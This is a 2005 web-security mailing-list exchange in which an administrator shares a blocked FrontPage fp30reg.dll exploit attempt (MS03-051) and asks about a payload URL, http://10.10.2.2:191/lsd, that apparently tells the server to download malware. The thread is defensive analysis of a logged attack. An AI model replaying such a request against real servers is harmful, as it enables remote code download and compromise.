[WEB SECURITY] Frontpage Exploit - Strange POST Payload

Chris Weber chris at lookout.net
Tue Jun 21 14:15:52 EDT 2005


Not answering your questions specifically but this looks like an attempt to
exploit a pretty old vulnerability announced in MS03-051.

http://www.securiteam.com/windowsntfocus/6M00B0K8UE.html 



-----Original Message-----
From: Ryan Barnett [mailto:rcbarnett at gmail.com] 
Sent: Tuesday, June 21, 2005 7:20 AM
To: Web Security
Subject: [WEB SECURITY] Frontpage Exploit - Strange POST Payload

I received a Frontpage exploit
(http://www.osvdb.org/displayvuln.php?osvdb_id=2952&Lookup=Lookup)
attempt yesterday.  I get these types of probes all the time (as I am sure
most of you do as well).  I normally filter these requests as I am not using
Frontpage.  The reason that I took a look at this particular request log is
that it triggered a Shellcode sig in Snort.

Since there was some binary data in the request, I piped it through strings.
Here is the log entry -

========================================
Request: 66.161.76.150 - - [20/Jun/2005:23:31:11 --0400] "POST
/_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
Host: 199.196.145.215
Transfer-Encoding: chunked
Content-Length: 1499
mod_security-message: Access denied with code 403. Pattern match
"/fp30reg\.dll" at THE_REQUEST
mod_security-action: 403
1499
Ehttp://10.10.2.2:191/lsd
080/lsd
,0F4
%**f

HTTP/1.1 403 Forbidden
========================================

What was interesting was the POST payload of the request, specifically the
URL - http://10.10.2.2:191/lsd.  Has anyone else seen this before?  Three
questions that I have when looking at this -

1) This appears to be an attempt to have my vulnerable server download
something from a remote website.  If this is so, why the use of the
non-routable IP address (10.10.X.X)?  My server wouldn't be able to get to
the attacker's site...

2) What about the use of port 191?  This port seems to be related to the
propero service (by Cliff Neuman).  Does anyone know of any trojans that use
this port?

3) I am assuming that "/lsd" URI is a file for some form of malware.

Let me know if you have any insight into this exploit attempt.

Thanks.

--
Ryan C. Barnett
Web Application Security Consortium (WASC) Member CIS Apache Benchmark
Project Lead SANS Instructor: Securing Apache GCIA, GCFA, GCIH, GSNA, GCUX,
GSEC

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/


---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/



More information about the websecurity mailing list